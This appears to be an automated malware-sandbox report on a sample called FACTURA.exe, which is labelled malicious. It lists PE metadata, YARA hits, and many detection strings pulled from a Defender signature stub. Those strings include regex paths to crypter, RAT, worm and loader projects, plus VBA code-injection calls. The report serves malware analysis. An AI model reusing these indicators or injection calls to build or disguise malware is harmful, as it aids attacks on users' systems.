Source: mpuxagent.dll.mui31.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui37.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui20.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.45.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui39.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui0.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui29.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui22.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui32.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui7.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui17.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui10.45.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui2.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui1.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui3.45.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll.45.dr	Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.35.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui1.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui28.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui10.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui16.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui7.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui33.45.dr	Static PE information: No import functions for PE file found
Source: mpavbase.vdm.36.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui9.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.45.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui6.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui10.45.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui20.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui40.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui38.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll0.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui43.45.dr	Static PE information: No import functions for PE file found
Source: mpasbase.vdm.36.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui9.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.45.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui36.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.45.dr	Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.35.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui42.45.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui4.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui19.45.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.45.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui5.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui41.45.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.45.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.45.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.45.dr	Static PE information: No import functions for PE file found

Source: FACTURA.exe, 00000001.00000000.2845557618.000000000041B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCounterfoil7.exe vs FACTURA.exe
Source: FACTURA.exe, 00000001.00000000.2904734110.0000000002AE0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCounterfoil7.exeFE2XCollides Systems, Inc. vs FACTURA.exe

Source: C:\Windows\System32\wevtutil.exe

Process token adjusted: Security

Source: Yara match	File source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Source: FACTURA.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FACTURA.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@13/235@1/0

Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: winhost.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: -(.+\\.+Cal.*smalar\\FlooDer\\FLooDeR.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: /.+:\\.+\\fuckADX\\.+\\ADs.\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	Binary or memory string: dTP*\AD:\Master\ADWARA_NEW\idle_componet.vbpd
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\Admin\Desktop\other_cr\R_PE\2201\_CLC.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: 0+.+\\mywisdom\\asian_scandal.+\\ngentot.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: .+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	Binary or memory string: .+:\\aw1\\Etmscztha.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: \pekalongan.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: *\AD:\Documents\Documents11\Secret\Basic\Update\Worm+Trojan\worm.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: ,'Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: vD:\virustrojan\harpotinfeksiexe\harpotinfeksiexe\SERVER.VBP
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: .+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\.+\\Nueva carpeta\\###################################################################################################################################.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: z1.vbp]
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: f\MurdeR\Escritorio\Desktop\cypter\stub\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: TOC:\\Documents and Settings\\astronalta\\Meus documentos\\.+\\LOAD_GEAR\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	Binary or memory string: prjGenerator.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: 0+.+:\\.NOVO.+\\BLINDADO\\PluginBrada..vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: @\Hugo Tools\DRONES\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: V\Stuffs\w32.AntiAnarchy.E@mm\Havoc.Worm.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: '".+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	Binary or memory string: E:\\kaynak( Kod\|~1)\\spynma(il_Merged\|~1).+?\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: /*.+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: 0.vbp
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	Binary or memory string: Z*\AE:\Stuff\Lilith Premium\Start\Projekt1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: @*\AY:\zeus\downloadersource\My_Crypter_vbcrypter\vbcrypter\newStubMy\myprog.vbp
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	Binary or memory string: C:\\(DOCUME~1\|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win\|wix\|WS86).+?\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: &!C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: 4/:\\.+\\mStubmmmm\\Backup-.+\\Backup-.+\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	Binary or memory string: .VBProjects
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: phapoeskeezm.vbp
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	Binary or memory string: *\AD:\Lap Trinh\Virus Mau\Pro 3\Pro3.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: .+:\\.\\MicroApp.\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: @\Polifemo Ebrio Crypter\Stub.vbp
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	Binary or memory string: 72E:\\kaynak( Kod\|~1)\\spynma(il_Merged\|~1).+?\.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: D:\\.{15}\\WEBPNT\\WebpNt\.vBp
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	Binary or memory string: \RenoNevada\MainMango\Server.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: MSVBVM60.DLLd \DBSpy\DBSpy.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: \IELOCK.VBP
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: \CEF\VBBHO.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: .+:\\clean ppi\\temp\\.+\\DownloadBinary.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: .+:\\.NOVO.+\\BLINDADO\\PluginBrada..vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: GB.+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: '".+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString]
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: \MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: 61.+:\\.\\MicroApp.\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\astronalta\\Meus documentos\\.+\\LOAD_GEAR\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6329226003.00000197A33A2000.00000004.00000001.sdmp	Binary or memory string: C:\NuAT.vbp]
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: :\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: PAJ:\MASTER\bb_soft\bb_promo\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: p\new2911.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: >\legal notice viri\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: worm2007.vbp
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	Binary or memory string: 1ocuments and Settings\Usuario\1scritorio\Ex\Ex.vbp]
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: .+\\Cryptosy\\Stub\\Stub.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: .+:\\SoUrCe.!\\.SOURC.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: AC:\Atari.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: 2\Clemis-Gay\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: PProgramKecil\SetanWare\LWDay.2\LWDay.vbp
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: .+\\(BotSupho Compiler\|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: \REeB.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: D:\\.+\\.+fcx\\.+1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: 2sharK\Server\Projekt1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: ,Z:\a_new_dll\VIVAX.vbp]
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	Binary or memory string: ^Systema So as ipanema tem\INSTALL\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: :\captura\joinner\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: :\\Jhocko\\Loader\\Loader.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: .+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: ^\ie.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: H\Users\User\Desktop\hta\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: C:\\Games\\.*\\Crypter\\Crypter Source\\Stub\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: .+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\uko\\Desktop\\PRIMO\\NOVOLOAD.*\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: D:\\Setup\\Drivers\\Audio\\Installs_the_RealTek_AC_97_audio_driver\\WDM5630\\Documents\\Documents11\\Secret\\Basic\\Updated\\Dao chich\\final 007 spy\\.+\.vbp
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\SqUeEzEr\Desktop\OPENSC CODES FROM ME\Downloader\.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: .+:\\Apub\\Cyfjrvepg.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: 0MicroProCon\MicroCon.vbp
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: >9C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: ,\Asmahani\Asmahani.vbp
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	Binary or memory string: lgC:\\(DOCUME~1\|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win\|wix\|WS86).+?\.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: &Desktop\ery\ery.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: .+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: :5C:\\Users\\box1\\Desktop\\7black2\\[a-zA-Z]{10,}.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: .+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: :\\.+\\mStubmmmm\\Backup-.+\\Backup-.+\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: 50.+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: bradesco.vbp
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	Binary or memory string: RF:\vb\VISUAL BASIC\VARIOS\teuer\Teuer.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: 6\NotPHP +RSRC SQlite\sm.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: Safety.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: 4\MicroProCon\SeconFile.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: 2-.+:\\clean ppi\\temp\\.+\\DownloadBinary.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: OJC:\\Documents and Settings\\uko\\Desktop\\PRIMO\\NOVOLOAD.*\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	Binary or memory string: ,:\revolucao\SysBox.vbpax
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	Binary or memory string: @*\AD:\Master\ADWARA_NEW\codec\Codec.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: 3.D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: A<C:\\Games\\.*\\Crypter\\Crypter Source\\Stub\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	Binary or memory string: \trash\VB\Bus_dest\bus_des2.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: \Revolta.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: T@*\AC:\Dan\sources\RAT Server\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: .+\\.+Cal.*smalar\\FlooDer\\FLooDeR.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: C:.+\\IJEFJIJEFGIJE.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: 1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: \Sp-Binder\Extracter\SpBinderExtracter.vbp]
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: Jwarka\kul\201-solitaire\Solitaire.vbp
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: >9.+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: .+\\installscash nno form wow downloader\\mycc\\Project1.vbp
